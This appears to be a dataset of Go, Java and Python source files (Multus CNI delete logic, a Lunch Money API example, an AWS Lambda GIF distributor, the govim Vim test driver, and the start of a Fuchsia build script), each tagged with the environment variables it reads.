func cmdGet(args *skel.CmdArgs, exec invoke.Exec, kubeClient *k8s.ClientInfo) (cnitypes.Result, error) {
logging.Debugf("cmdGet: %v, %v, %v", args, exec, kubeClient)
in, err := types.LoadNetConf(args.StdinData)
if err != nil {
return nil, err
}
// FIXME: call all delegates
return in.PrevResult, nil
}
func cmdDel(args *skel.CmdArgs, exec invoke.Exec, kubeClient *k8s.ClientInfo) error {
logging.Debugf("cmdDel: %v, %v, %v", args, exec, kubeClient)
in, err := types.LoadNetConf(args.StdinData)
if err != nil {
return err
}
netnsfound := true
netns, err := ns.GetNS(args.Netns)
if err != nil {
// The netns passed down by the Cloud Orchestration Engine may no longer exist, or DEL may be called multiple times,
// so don't return an error if the device is already removed.
// https://github.com/kubernetes/kubernetes/issues/43014#issuecomment-287164444
_, ok := err.(ns.NSPathNotExistErr)
if ok {
netnsfound = false
logging.Debugf("cmdDel: WARNING netns may not exist, netns: %s, err: %s", args.Netns, err)
} else {
return cmdErr(nil, "failed to open netns %q: %v", netns, err)
}
}
if netns != nil {
defer netns.Close()
}
k8sArgs, err := k8s.GetK8sArgs(args)
if err != nil {
return cmdErr(nil, "error getting k8s args: %v", err)
}
// Read the cache to get delegates json for the pod
netconfBytes, path, err := consumeScratchNetConf(args.ContainerID, in.CNIDir)
if err != nil {
// Fetch delegates again if the cache does not exist
if os.IsNotExist(err) {
if in.ClusterNetwork != "" {
err = k8s.GetDefaultNetworks(k8sArgs, in, kubeClient)
if err != nil {
return cmdErr(k8sArgs, "failed to get clusterNetwork/defaultNetworks: %v", err)
}
// First delegate is always the master plugin
in.Delegates[0].MasterPlugin = true
}
// Get pod annotation and so on
_, _, err := k8s.TryLoadPodDelegates(k8sArgs, in, kubeClient)
if err != nil {
if len(in.Delegates) == 0 {
// No delegate available so send error
return cmdErr(k8sArgs, "failed to get delegates: %v", err)
}
// clusterNetwork was already fetched above, so continue with the delete
logging.Errorf("Multus: failed to get delegates: %v, but continue to delete clusterNetwork", err)
}
} else {
return cmdErr(k8sArgs, "error reading the delegates: %v", err)
}
} else {
defer os.Remove(path)
if err := json.Unmarshal(netconfBytes, &in.Delegates); err != nil {
return cmdErr(k8sArgs, "failed to load netconf: %v", err)
}
// check the plugins field and enable ConfListPlugin if it is present
for _, v := range in.Delegates {
if len(v.ConfList.Plugins) != 0 {
v.ConfListPlugin = true
}
}
// First delegate is always the master plugin
in.Delegates[0].MasterPlugin = true
}
// set CNIVersion in the delegate CNI config if it has no CNIVersion and the multus conf has one.
for _, v := range in.Delegates {
if v.ConfListPlugin && v.ConfList.CNIVersion == "" && in.CNIVersion != "" {
v.ConfList.CNIVersion = in.CNIVersion
v.Bytes, err = json.Marshal(v.ConfList)
}
}
// unset the network status annotation in the apiserver, but only when Multus has a kubeconfig
if in.Kubeconfig != "" {
if netnsfound {
if !types.CheckSystemNamespaces(string(k8sArgs.K8S_POD_NAMESPACE), in.SystemNamespaces) {
err := k8s.SetNetworkStatus(kubeClient, k8sArgs, nil, in)
if err != nil {
// an error happened, but continue with the delete
logging.Errorf("Multus: error unsetting the networks status: %v", err)
}
}
} else {
logging.Debugf("WARNING: Unset SetNetworkStatus skipped due to netns not found.")
}
}
rt := types.CreateCNIRuntimeConf(args, k8sArgs, "", in.RuntimeConfig)
return delPlugins(exec, args.IfName, in.Delegates, len(in.Delegates)-1, rt, in.BinDir)
}
func main() {
// Init command line flags to clear flags registered by vendored packages, especially in their init() functions
flag.CommandLine = flag.NewFlagSet(os.Args[0], flag.ExitOnError)
// add version flag
versionOpt := false
flag.BoolVar(&versionOpt, "version", false, "Show application version")
flag.BoolVar(&versionOpt, "v", false, "Show application version")
flag.Parse()
if versionOpt {
fmt.Printf("%s\n", printVersionString())
return
}
skel.PluginMain(
func(args *skel.CmdArgs) error {
result, err := cmdAdd(args, nil, nil)
if err != nil {
return err
}
return result.Print()
},
func(args *skel.CmdArgs) error {
result, err := cmdGet(args, nil, nil)
if err != nil {
return err
}
return result.Print()
},
func(args *skel.CmdArgs) error { return cmdDel(args, nil, nil) },
cniversion.All, "meta-plugin that delegates to other CNI plugins")
}
|
environment: ["\"CNI_PATH\"", "\"CNI_PATH\"", "\"CNI_PATH\"", "\"CNI_PATH\"", "\"CNI_NETNS\"", "\"CNI_ARGS\""] | variablearg: [] | constarg: ["CNI_ARGS", "CNI_NETNS", "CNI_PATH"] | variableargjson: [] | constargjson: ["CNI_ARGS", "CNI_NETNS", "CNI_PATH"] | lang: go | constargcount: 3 | variableargcount: 0 | sentence: ""
examples/transaction/main.go
|
package main
import (
"context"
"log"
"os"
"github.com/icco/lunchmoney"
)
func main() {
ctx := context.Background()
token := os.Getenv("LUNCHMONEY_TOKEN")
client, _ := lunchmoney.NewClient(token)
t, err := client.GetTransaction(ctx, 1, nil)
if err != nil {
log.Panicf("err: %+v", err)
}
log.Printf("%+v", t)
}
|
environment: ["\"LUNCHMONEY_TOKEN\""] | variablearg: [] | constarg: ["LUNCHMONEY_TOKEN"] | variableargjson: [] | constargjson: ["LUNCHMONEY_TOKEN"] | lang: go | constargcount: 1 | variableargcount: 0 | sentence: ""
function/gif-distributor/main.go
|
package main
import (
"context"
"fmt"
"log"
"os"
"time"
baselambda "github.com/aws/aws-lambda-go/lambda"
configv2 "github.com/aws/aws-sdk-go-v2/config"
lambdav2 "github.com/aws/aws-sdk-go-v2/service/lambda"
s3v2 "github.com/aws/aws-sdk-go-v2/service/s3"
"github.com/aws/aws-xray-sdk-go/instrumentation/awsv2"
"github.com/getsentry/sentry-go"
"github.com/dtan4/xlapse/service/lambda"
"github.com/dtan4/xlapse/service/s3"
"github.com/dtan4/xlapse/types"
v1 "github.com/dtan4/xlapse/types/v1"
"github.com/dtan4/xlapse/version"
)
var (
sentryEnabled = false
)
func init() {
if os.Getenv("SENTRY_DSN") != "" {
sentryEnabled = true
}
}
func HandleRequest(ctx context.Context) error {
bucket := os.Getenv("BUCKET")
key := os.Getenv("KEY")
farn := os.Getenv("GIF_MAKER_FUNCTION_ARN")
log.Printf("function version: %q", version.Version)
log.Printf("function built commit: %q", version.Commit)
log.Printf("function built date: %q", version.Date)
log.Printf("bucket: %q", bucket)
log.Printf("key: %q", key)
log.Printf("farn: %q", farn)
if sentryEnabled {
if err := sentry.Init(sentry.ClientOptions{
Dsn: os.Getenv("SENTRY_DSN"),
Transport: &sentry.HTTPSyncTransport{
Timeout: 5 * time.Second,
},
Release: version.Version,
// https://docs.aws.amazon.com/lambda/latest/dg/configuration-envvars.html#configuration-envvars-runtime
ServerName: os.Getenv("AWS_LAMBDA_FUNCTION_NAME"),
}); err != nil {
return fmt.Errorf("cannot initialize Sentry client: %w", err)
}
sentry.ConfigureScope(func(scope *sentry.Scope) {
scope.SetTag("function", "gif-distributor")
})
}
if err := do(ctx, bucket, key, farn); err != nil {
if sentryEnabled {
sentry.CaptureException(err)
}
return err
}
return nil
}
func main() {
baselambda.Start(HandleRequest)
}
func do(ctx context.Context, bucket, key, farn string) error {
cfg, err := configv2.LoadDefaultConfig(ctx)
if err != nil {
return fmt.Errorf("cannot load default AWS SDK config: %w", err)
}
awsv2.AWSV2Instrumentor(&cfg.APIOptions)
s3Client := s3.NewV2(s3v2.NewFromConfig(cfg))
body, err := s3Client.GetObject(ctx, bucket, key)
if err != nil {
return fmt.Errorf("cannot download file from S3 (bucket: %q, key: %q): %w", bucket, key, err)
}
es, err := types.DecodeEntriesYAML(body)
if err != nil {
return fmt.Errorf("cannot decode YAML: %w", err)
}
api := lambdav2.NewFromConfig(cfg)
lambdaClient := lambda.NewV2(api)
now := time.Now()
for _, e := range es {
log.Printf("URL: %q, Bucket: %q, KeyPrefix: %q, Timezone: %q\n", e.GetUrl(), e.GetBucket(), e.GetKeyPrefix(), e.GetTimezone())
loc, err := time.LoadLocation(e.Timezone)
if err != nil {
return fmt.Errorf("cannot load timezone %q: %w", e.Timezone, err)
}
yday := now.In(loc).Add(-24 * time.Hour)
log.Printf("yesterday: %q", yday.String())
req := &v1.GifRequest{
Bucket: e.GetBucket(),
KeyPrefix: e.GetKeyPrefix(),
Year: int32(yday.Year()),
Month: int32(yday.Month()),
Day: int32(yday.Day()),
}
log.Printf("invoking gif-maker function for bucket %q key %q", e.Bucket, e.KeyPrefix)
if err := lambdaClient.InvokeGifMakerFuncs(ctx, req, farn); err != nil {
return fmt.Errorf("cannot invoke gif-maker function: %w", err)
}
}
return nil
}
|
environment: ["\"SENTRY_DSN\"", "\"BUCKET\"", "\"KEY\"", "\"GIF_MAKER_FUNCTION_ARN\"", "\"SENTRY_DSN\"", "\"AWS_LAMBDA_FUNCTION_NAME\""] | variablearg: [] | constarg: ["BUCKET", "AWS_LAMBDA_FUNCTION_NAME", "SENTRY_DSN", "KEY", "GIF_MAKER_FUNCTION_ARN"] | variableargjson: [] | constargjson: ["BUCKET", "AWS_LAMBDA_FUNCTION_NAME", "SENTRY_DSN", "KEY", "GIF_MAKER_FUNCTION_ARN"] | lang: go | constargcount: 5 | variableargcount: 0 | sentence: ""
java-tool/src/main/java/com/github/shoothzj/javatool/util/JdkUtil.java
|
package com.github.shoothzj.javatool.util;
import lombok.extern.slf4j.Slf4j;
/**
* @author hezhangjian
*/
@Slf4j
public class JdkUtil {
public static final String JAVA_HOME_PATH = System.getenv("JAVA_HOME");
}
|
environment: ["\"JAVA_HOME\""] | variablearg: [] | constarg: ["JAVA_HOME"] | variableargjson: [] | constargjson: ["JAVA_HOME"] | lang: java | constargcount: 1 | variableargcount: 0 | sentence: ""
testdriver/testdriver.go
|
// Package testdriver is a support package for plugins written using github.com/myitcv/govim
package testdriver
import (
"bufio"
"bytes"
"encoding/json"
"flag"
"fmt"
"io"
"io/ioutil"
"net"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"sync"
"time"
"github.com/acarl005/stripansi"
"github.com/kr/pty"
"github.com/myitcv/govim"
"github.com/myitcv/govim/testsetup"
"github.com/rogpeppe/go-internal/semver"
"github.com/rogpeppe/go-internal/testscript"
"gopkg.in/retry.v1"
"gopkg.in/tomb.v2"
)
const (
KeyErrLog = "errLog"
)
// TODO - this code is a mess and needs to be fixed
type TestDriver struct {
govimListener net.Listener
driverListener net.Listener
govim govim.Govim
Log io.Writer
debug Debug
cmd *exec.Cmd
name string
plugin govim.Plugin
quitVim chan bool
quitGovim chan bool
quitDriver chan bool
doneQuitVim chan bool
doneQuitGovim chan bool
doneQuitDriver chan bool
tomb tomb.Tomb
closeLock sync.Mutex
closed bool
}
type Config struct {
Name, GovimPath, TestHomePath, TestPluginPath string
Debug
Log io.Writer
*testscript.Env
Plugin govim.Plugin
}
type Debug struct {
Enabled bool
VimLogLevel int
VimLogPath string
GovimLogPath string
}
func NewTestDriver(c *Config) (*TestDriver, error) {
res := &TestDriver{
quitVim: make(chan bool),
quitGovim: make(chan bool),
quitDriver: make(chan bool),
doneQuitVim: make(chan bool),
doneQuitGovim: make(chan bool),
doneQuitDriver: make(chan bool),
name: c.Name,
plugin: c.Plugin,
}
if c.Log != nil {
res.Log = c.Log
} else {
res.Log = ioutil.Discard
}
gl, err := net.Listen("tcp4", "localhost:0")
if err != nil {
return nil, fmt.Errorf("failed to create listener for govim: %v", err)
}
dl, err := net.Listen("tcp4", ":0")
if err != nil {
return nil, fmt.Errorf("failed to create listener for driver: %v", err)
}
if err := copyDir(c.TestPluginPath, c.GovimPath); err != nil {
return nil, fmt.Errorf("failed to copy %v to %v: %v", c.GovimPath, c.TestPluginPath, err)
}
srcVimrc := filepath.Join(c.GovimPath, "cmd", "govim", "config", "minimal.vimrc")
dstVimrc := filepath.Join(c.TestHomePath, ".vimrc")
if err := copyFile(dstVimrc, srcVimrc); err != nil {
return nil, fmt.Errorf("failed to copy %v to %v: %v", srcVimrc, dstVimrc, err)
}
res.govimListener = gl
res.driverListener = dl
c.Env.Vars = append(c.Env.Vars,
"GOVIMTEST_SOCKET="+res.govimListener.Addr().String(),
"GOVIMTESTDRIVER_SOCKET="+res.driverListener.Addr().String(),
)
_, cmd, err := testsetup.EnvLookupFlavorCommand()
if err != nil {
return nil, err
}
vimCmd := cmd
if e := os.Getenv("VIM_COMMAND"); e != "" {
vimCmd = strings.Fields(e)
}
if c.Debug.Enabled {
res.debug = c.Debug
vimCmd = append(vimCmd, fmt.Sprintf("-V%d%s", c.Debug.VimLogLevel, c.VimLogPath))
}
res.cmd = exec.Command(vimCmd[0], vimCmd[1:]...)
res.cmd.Env = c.Env.Vars
res.cmd.Dir = c.Env.WorkDir
if res.debug.Enabled {
envlist := ""
for _, e := range c.Env.Vars {
if e != ":=:" {
envlist += " " + strings.ReplaceAll(e, " ", `\ `)
}
}
fmt.Printf("Test command:\n==========================\npushd %s && %s %s && popd\n==========================\n", c.Env.WorkDir, envlist, strings.Join(res.cmd.Args, " "))
}
return res, nil
}
func (d *TestDriver) Logf(format string, a ...interface{}) {
fmt.Fprintf(d.Log, format+"\n", a...)
}
func (d *TestDriver) LogStripANSI(r io.Reader) {
scanner := bufio.NewScanner(r)
for {
ok := scanner.Scan()
if !ok {
if scanner.Err() != nil {
fmt.Fprintf(d.Log, "Erroring copying log: %+v\n", scanner.Err())
}
return
}
fmt.Fprint(d.Log, stripansi.Strip(scanner.Text()))
}
}
func copyDir(dst, src string) error {
return filepath.Walk(src, func(path string, info os.FileInfo, err error) error {
switch path {
case filepath.Join(src, ".git"), filepath.Join(src, "cmd", "govim", ".bin"):
return filepath.SkipDir
}
rel := strings.TrimPrefix(path, src)
if strings.HasPrefix(rel, string(os.PathSeparator)) {
rel = strings.TrimPrefix(rel, string(os.PathSeparator))
}
dstpath := filepath.Join(dst, rel)
if info.IsDir() {
return os.MkdirAll(dstpath, 0777)
}
return copyFile(dstpath, path)
})
}
func copyFile(dst, src string) error {
r, err := os.Open(src)
if err != nil {
return err
}
w, err := os.Create(dst)
if err != nil {
return err
}
if _, err := io.Copy(w, r); err != nil {
return err
}
r.Close()
return w.Close()
}
func (d *TestDriver) Run() error {
d.tombgo(d.runVim)
if err := d.listenGovim(); err != nil {
return err
}
select {
case <-d.tomb.Dying():
return d.tomb.Err()
case <-d.govim.Initialized():
}
return nil
}
func (d *TestDriver) Wait() error {
return d.tomb.Wait()
}
func (d *TestDriver) runVim() error {
d.Logf("Starting vim")
thepty, err := pty.Start(d.cmd)
if err != nil {
close(d.doneQuitVim)
err := fmt.Errorf("failed to start %v: %v", strings.Join(d.cmd.Args, " "), err)
d.Logf("error: %+v", err)
return err
}
d.tombgo(func() error {
defer func() {
thepty.Close()
close(d.doneQuitVim)
}()
d.Logf("Waiting for command to exit")
if err := d.cmd.Wait(); err != nil {
select {
case <-d.quitVim:
default:
return fmt.Errorf("vim exited: %v", err)
}
}
return nil
})
if d.debug.Enabled {
d.LogStripANSI(thepty)
} else {
io.Copy(ioutil.Discard, thepty)
}
d.Logf("Vim running")
return nil
}
func (d *TestDriver) Close() {
d.closeLock.Lock()
if d.closed {
d.closeLock.Unlock()
return
}
d.closed = true
d.closeLock.Unlock()
select {
case <-d.doneQuitVim:
default:
close(d.quitVim)
}
select {
case <-d.doneQuitGovim:
default:
close(d.quitGovim)
}
select {
case <-d.doneQuitDriver:
default:
close(d.quitDriver)
}
select {
case <-d.doneQuitVim:
default:
func() {
defer func() {
if r := recover(); r != nil && r != govim.ErrShuttingDown {
panic(r)
}
}()
d.govim.ChannelEx("qall!")
}()
<-d.doneQuitVim
}
select {
case <-d.doneQuitGovim:
default:
d.govimListener.Close()
<-d.doneQuitGovim
}
select {
case <-d.doneQuitDriver:
default:
d.driverListener.Close()
<-d.doneQuitDriver
}
}
func (d *TestDriver) tombgo(f func() error) {
d.tomb.Go(func() error {
err := f()
if err != nil {
fmt.Printf(">>> %v\n", err)
if d.debug.Enabled {
fmt.Printf("Govim debug logs:\n==========================\n")
f, err := os.Open(d.debug.GovimLogPath)
if err != nil {
fmt.Printf("Error opening debug logs: %+v\n", err)
} else {
io.Copy(os.Stdout, f)
}
fmt.Printf("==========================\n")
}
d.Close()
}
return err
})
}
func (d *TestDriver) listenGovim() error {
good := false
defer func() {
if !good {
close(d.doneQuitGovim)
close(d.doneQuitDriver)
}
}()
d.Logf("Waiting for govim connection on %v...", d.govimListener.Addr())
conn, err := d.govimListener.Accept()
if err != nil {
select {
case <-d.quitGovim:
return nil
default:
return fmt.Errorf("failed to accept connection on %v: %v", d.govimListener.Addr(), err)
}
}
d.Logf("Accepted govim connection on %s", d.govimListener.Addr().String())
var log io.Writer = ioutil.Discard
if d.Log != nil {
log = d.Log
}
g, err := govim.NewGovim(d.plugin, conn, conn, log)
if err != nil {
return fmt.Errorf("failed to create govim: %v", err)
}
good = true
d.govim = g
d.tombgo(d.listenDriver)
d.tombgo(d.runGovim)
return nil
}
func (d *TestDriver) runGovim() error {
defer close(d.doneQuitGovim)
if err := d.govim.Run(); err != nil {
select {
case <-d.quitGovim:
default:
return fmt.Errorf("govim Run failed: %v", err)
}
}
return nil
}
func (d *TestDriver) listenDriver() error {
defer close(d.doneQuitDriver)
err := d.govim.DoProto(func() error {
Accept:
for {
d.Logf("Waiting for govim driver connection on %s...", d.driverListener.Addr().String())
conn, err := d.driverListener.Accept()
if err != nil {
select {
case <-d.quitDriver:
break Accept
default:
panic(fmt.Errorf("failed to accept connection to driver on %v: %v", d.driverListener.Addr(), err))
}
}
d.Logf("Accepted driver connection on %v", d.driverListener.Addr())
dec := json.NewDecoder(conn)
var args []interface{}
if err := dec.Decode(&args); err != nil {
panic(fmt.Errorf("failed to read command for driver: %v", err))
}
cmd := args[0]
res := []interface{}{""}
add := func(err error, is ...interface{}) {
toAdd := []interface{}{""}
if err != nil {
toAdd[0] = err.Error()
} else {
toAdd = append(toAdd, is...)
}
res = append(res, toAdd)
}
switch cmd {
case "redraw":
var force string
if len(args) == 2 {
force = args[1].(string)
}
<-d.govim.Schedule(func(g govim.Govim) error {
add(g.ChannelRedraw(force == "force"))
return nil
})
case "ex":
expr := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
add(g.ChannelEx(expr))
return nil
})
case "normal":
expr := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
add(g.ChannelNormal(expr))
return nil
})
case "expr":
expr := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
resp, err := g.ChannelExpr(expr)
add(err, resp)
return nil
})
case "call":
fn := args[1].(string)
<-d.govim.Schedule(func(g govim.Govim) error {
resp, err := g.ChannelCall(fn, args[2:]...)
add(err, resp)
return nil
})
default:
panic(fmt.Errorf("don't yet know how to handle %v", cmd))
}
enc := json.NewEncoder(conn)
if err := enc.Encode(res); err != nil {
panic(fmt.Errorf("failed to encode response %v: %v", res, err))
}
conn.Close()
}
return nil
})
if err != nil {
return fmt.Errorf("%v", err)
}
return nil
}
// Vim is a sidecar that effectively drives Vim via a simple JSON-based
// API
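// An illustrative exchange (a sketch inferred from the driver's handling in
// listenDriver above, not a documented wire format): the outer error string is
// protocol-level, the inner one is Vim-level:
//
//	-> ["expr", "2+2"]
//	<- ["", ["", 4]]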
func Vim() (exitCode int) {
logFile := os.Getenv("GOVIMTESTDRIVER_LOG")
var l io.Writer
if logFile != "" {
var err error
l, err = os.OpenFile(logFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
panic(fmt.Sprintf("Could not open log file: %+v", err))
}
} else {
l = ioutil.Discard
}
log := func(format string, args ...interface{}) {
fmt.Fprintf(l, "[vim test client] "+format, args...)
}
log("logging enabled")
defer func() {
r := recover()
if r == nil {
return
}
exitCode = -1
fmt.Fprintln(os.Stderr, r)
log("panic with error: %+v", r)
}()
ef := func(format string, args ...interface{}) {
log(format, args...)
panic(fmt.Sprintf(format, args...))
}
fs := flag.NewFlagSet("vim", flag.PanicOnError)
bang := fs.Bool("bang", false, "expect command to fail")
indent := fs.Bool("indent", false, "pretty indent resulting JSON")
stringout := fs.Bool("stringout", false, "print resulting string rather than JSON encoded version of string")
log("starting vim driver client and parsing flags...")
fs.Parse(os.Args[1:])
args := fs.Args()
fn := args[0]
var jsonArgs []string
for i, a := range args {
if i <= 1 {
uq, err := strconv.Unquote("\"" + a + "\"")
if err != nil {
ef("failed to unquote %q: %v", a, err)
}
jsonArgs = append(jsonArgs, strconv.Quote(uq))
} else {
var buf bytes.Buffer
json.HTMLEscape(&buf, []byte(a))
jsonArgs = append(jsonArgs, buf.String())
}
}
jsonArgString := "[" + strings.Join(jsonArgs, ", ") + "]"
var i []interface{}
if err := json.Unmarshal([]byte(jsonArgString), &i); err != nil {
ef("failed to json Unmarshal %q: %v", jsonArgString, err)
}
switch fn {
case "redraw":
// optional argument of force
switch l := len(args[1:]); l {
case 0:
case 1:
if args[1] != "force" {
ef("unknown argument %q to redraw", args[1])
}
default:
ef("redraw has a single optional argument: force; we saw %v", l)
}
case "ex", "normal", "expr":
switch l := len(args[1:]); l {
case 1:
if _, ok := i[1].(string); !ok {
ef("%v takes a string argument; saw %T", fn, i[1])
}
default:
ef("%v takes a single argument: we saw %v", fn, l)
}
case "call":
switch l := len(args[1:]); l {
case 1:
// no args
if _, ok := i[1].(string); !ok {
ef("%v takes a string as its first argument; saw %T", fn, i[1])
}
case 2:
if _, ok := i[1].(string); !ok {
ef("%v takes a string as its first argument; saw %T", fn, i[1])
}
vs, ok := i[2].([]interface{})
if !ok {
ef("%v takes a slice of values as its second argument; saw %T", fn, i[2])
}
// on the command line we require the args to be specified as an array
// for ease of explanation/documentation, but now we splat the slice
i = append(i[:2], vs...)
default:
ef("%v takes a two arguments: we saw %v", fn, l)
}
}
if bs, err := json.Marshal(i); err != nil {
ef("failed to remarshal json args: %v", err)
} else {
jsonArgString = string(bs)
}
addr := os.Getenv("GOVIMTESTDRIVER_SOCKET")
conn, err := net.Dial("tcp", addr)
if err != nil {
ef("failed to connect to driver on %v: %v", addr, err)
}
if _, err := fmt.Fprintln(conn, jsonArgString); err != nil {
ef("failed to send command %q to driver on: %v", jsonArgString, err)
}
dec := json.NewDecoder(conn)
var resp []interface{}
if err := dec.Decode(&resp); err != nil {
ef("failed to decode response: %v", err)
}
if resp[0] != "" {
// this is a protocol-level error
ef("got error response: %v", resp[0])
}
// resp[1] will be a []interface{} where the first
// element will be a Vim-level error
vimResp := resp[1].([]interface{})
if err := vimResp[0].(string); err != "" {
// this was a vim-level error
if !*bang {
ef("unexpected command error: %v", err)
}
fmt.Fprintln(os.Stderr, err)
}
if len(vimResp) == 2 {
if *bang {
ef("unexpected command success")
}
if *stringout {
switch vimResp[1].(type) {
case string:
fmt.Print(vimResp[1])
default:
ef("response type is %T, not string", vimResp[1])
}
} else {
enc := json.NewEncoder(os.Stdout)
if *indent {
enc.SetIndent("", " ")
}
if err := enc.Encode(vimResp[1]); err != nil {
ef("failed to format output of JSON: %v", err)
}
}
}
conn.Close()
return 0
}
// Sleep is a convenience function for those odd occasions when you
// need to drop in a sleep, e.g. waiting for CursorHold to trigger
func Sleep(ts *testscript.TestScript, neg bool, args []string) {
if neg {
ts.Fatalf("sleep does not support neg")
}
if len(args) != 1 {
ts.Fatalf("sleep expects a single argument; got %v", len(args))
}
d, err := time.ParseDuration(args[0])
if err != nil {
ts.Fatalf("failed to parse duration %q: %v", args[0], err)
}
time.Sleep(d)
}
func Condition(cond string) (bool, error) {
envf, cmd, err := testsetup.EnvLookupFlavorCommand()
if err != nil {
return false, err
}
var f govim.Flavor
switch {
case strings.HasPrefix(cond, govim.FlavorVim.String()):
f = govim.FlavorVim
case strings.HasPrefix(cond, govim.FlavorGvim.String()):
f = govim.FlavorGvim
default:
return false, fmt.Errorf("unknown condition %v", cond)
}
v := strings.TrimPrefix(cond, f.String())
if envf != f {
return false, nil
}
if v == "" {
return true, nil
}
if v[0] != ':' {
return false, fmt.Errorf("failed to find version separator")
}
v = v[1:]
if !semver.IsValid(v) {
return false, fmt.Errorf("%v is not a valid semver version", v)
}
switch f {
case govim.FlavorVim, govim.FlavorGvim:
cmd := cmd.BuildCommand("-v", "--version")
out, err := cmd.CombinedOutput()
if err != nil {
return false, fmt.Errorf("failed to run %v: %v\n%s", strings.Join(cmd.Args, " "), err, out)
}
version, err := govim.ParseVimVersion(out)
if err != nil {
return false, err
}
return semver.Compare(version, v) >= 0, nil
}
panic("should not reach here")
}
type LockingBuffer struct {
lock sync.Mutex
und bytes.Buffer
NextSearchInx int
}
func (l *LockingBuffer) Write(p []byte) (n int, err error) {
l.lock.Lock()
defer l.lock.Unlock()
return l.und.Write(p)
}
func (l *LockingBuffer) Bytes() []byte {
l.lock.Lock()
defer l.lock.Unlock()
return l.und.Bytes()
}
func ErrLogMatch(ts *testscript.TestScript, neg bool, args []string) {
errLogV := ts.Value(KeyErrLog)
if errLogV == nil {
ts.Fatalf("errlogmatch failed to find %v value", KeyErrLog)
}
errLog, ok := errLogV.(*LockingBuffer)
if !ok {
ts.Fatalf("errlogmatch %v was not the right type", KeyErrLog)
}
fs := flag.NewFlagSet("errlogmatch", flag.ContinueOnError)
fStart := fs.Bool("start", false, "search from beginning, not last snapshot")
fPeek := fs.Bool("peek", false, "do not adjust the NextSearchInx field on the errlog")
fWait := fs.String("wait", "", "retry (with exp backoff) until this time period has elapsed")
fCount := fs.Int("count", -1, "number of instances to wait for/match")
if err := fs.Parse(args); err != nil {
ts.Fatalf("errlogmatch: failed to parse args %v: %v", args, err)
}
if *fWait != "" && neg {
ts.Fatalf("-wait is not compatible with negating the command")
}
switch {
case *fCount < 0:
// not active
default:
if neg {
ts.Fatalf("cannot use -count with negated match")
}
}
if len(fs.Args()) != 1 {
ts.Fatalf("errlogmatch expects a single argument, the regexp to search for")
}
reg, err := regexp.Compile(fs.Args()[0])
if err != nil {
ts.Fatalf("errlogmatch failed to regexp.Compile %q: %v", fs.Args()[0], err)
}
wait := time.Duration(0)
if *fWait != "" {
pwait, err := time.ParseDuration(*fWait)
if err != nil {
ts.Fatalf("errlogmatch: failed to parse -maxwait duration %q: %v", *fWait, err)
}
wait = pwait
}
strategy := retry.LimitTime(wait,
retry.Exponential{
Initial: 10 * time.Millisecond,
Factor: 1.5,
},
)
// If we are not waiting, limit to one-shot (i.e. effectively negate the effect of
// the retry)
if *fWait == "" {
strategy = retry.LimitCount(1, strategy)
}
var nextInx int
if !*fPeek {
defer func() {
errLog.NextSearchInx = nextInx
}()
}
var matches [][]int
var searchStart int
for a := retry.Start(strategy, nil); a.Next(); {
toSearch := errLog.Bytes()
nextInx = len(toSearch)
if !*fStart {
searchStart = errLog.NextSearchInx
}
matches = reg.FindAllIndex(toSearch[searchStart:], -1)
if *fCount >= 0 {
if len(matches) != *fCount {
continue
}
if len(matches) > 0 {
nextInx = matches[len(matches)-1][1] + searchStart // End of last match
}
return
}
if matches != nil {
nextInx = matches[len(matches)-1][1] + searchStart // End of last match
if neg {
ts.Fatalf("errlogmatch found unexpected match (%q)", toSearch)
}
// we found a match or the correct count and were expecting it
return
}
}
if *fCount >= 0 {
ts.Fatalf("expected %v matches; found %v", *fCount, len(matches))
}
if !neg {
ts.Fatalf("errlogmatch failed to find match")
}
// we didn't find a match, but this is expected
}
|
environment: ["\"VIM_COMMAND\"", "\"GOVIMTESTDRIVER_LOG\"", "\"GOVIMTESTDRIVER_SOCKET\""] | variablearg: [] | constarg: ["GOVIMTESTDRIVER_LOG", "VIM_COMMAND", "GOVIMTESTDRIVER_SOCKET"] | variableargjson: [] | constargjson: ["GOVIMTESTDRIVER_LOG", "VIM_COMMAND", "GOVIMTESTDRIVER_SOCKET"] | lang: go | constargcount: 3 | variableargcount: 0 | sentence: ""
build/go/build.py
|
#!/usr/bin/env python3.8
# Copyright 2017 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Build script for a Go app.
import argparse
import os
import subprocess
import sys
import string
import shutil
import errno
from gen_library_metadata import get_sources
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--godepfile', help='Path to godepfile tool', required=True)
parser.add_argument(
'--root-out-dir', help='Path to root of build output', required=True)
parser.add_argument(
'--cc', help='The C compiler to use', required=False, default='cc')
parser.add_argument(
'--cxx', help='The C++ compiler to use', required=False, default='c++')
parser.add_argument(
'--dump-syms', help='The dump_syms tool to use', required=False)
parser.add_argument(
'--objcopy',
help='The objcopy tool to use',
required=False,
default='objcopy')
parser.add_argument('--sysroot', help='The sysroot to use', required=False)
parser.add_argument(
'--target', help='The compiler target to use', required=False)
parser.add_argument(
'--depfile', help='The path to the depfile', required=False)
parser.add_argument(
'--current-cpu',
help='Target architecture.',
choices=['x64', 'arm64'],
required=True)
parser.add_argument(
'--current-os',
help='Target operating system.',
choices=['fuchsia', 'linux', 'mac', 'win'],
required=True)
parser.add_argument('--buildidtool', help='The path to the buildidtool.')
parser.add_argument(
'--build-id-dir', help='The path to the .build-id directory.')
parser.add_argument(
'--go-root', help='The go root to use for builds.', required=True)
parser.add_argument(
'--go-cache', help='Cache directory to use for builds.', required=False)
parser.add_argument(
'--is-test', help='True if the target is a go test', default=False)
parser.add_argument('--buildmode', help='Build mode to use')
parser.add_argument(
'--gcflag',
help='Arguments to pass to Go compiler',
action='append',
default=[])
parser.add_argument(
'--ldflag',
help='Arguments to pass to Go linker',
action='append',
default=[])
parser.add_argument(
'--go-dep-files',
help='List of files describing library dependencies',
nargs='*',
default=[])
parser.add_argument(
'--root-build-dir',
help='Root build directory. Required if --go-dep-files is used.')
parser.add_argument('--binname', help='Output file', required=True)
parser.add_argument(
'--output-path',
help='Where to output the (unstripped) binary',
required=True)
parser.add_argument(
'--stripped-output-path',
help='Where to output a stripped binary, if supplied')
parser.add_argument(
'--verbose',
help='Tell the go tool to be verbose about what it is doing',
action='store_true')
parser.add_argument('--package', help='The package name', required=True)
parser.add_argument(
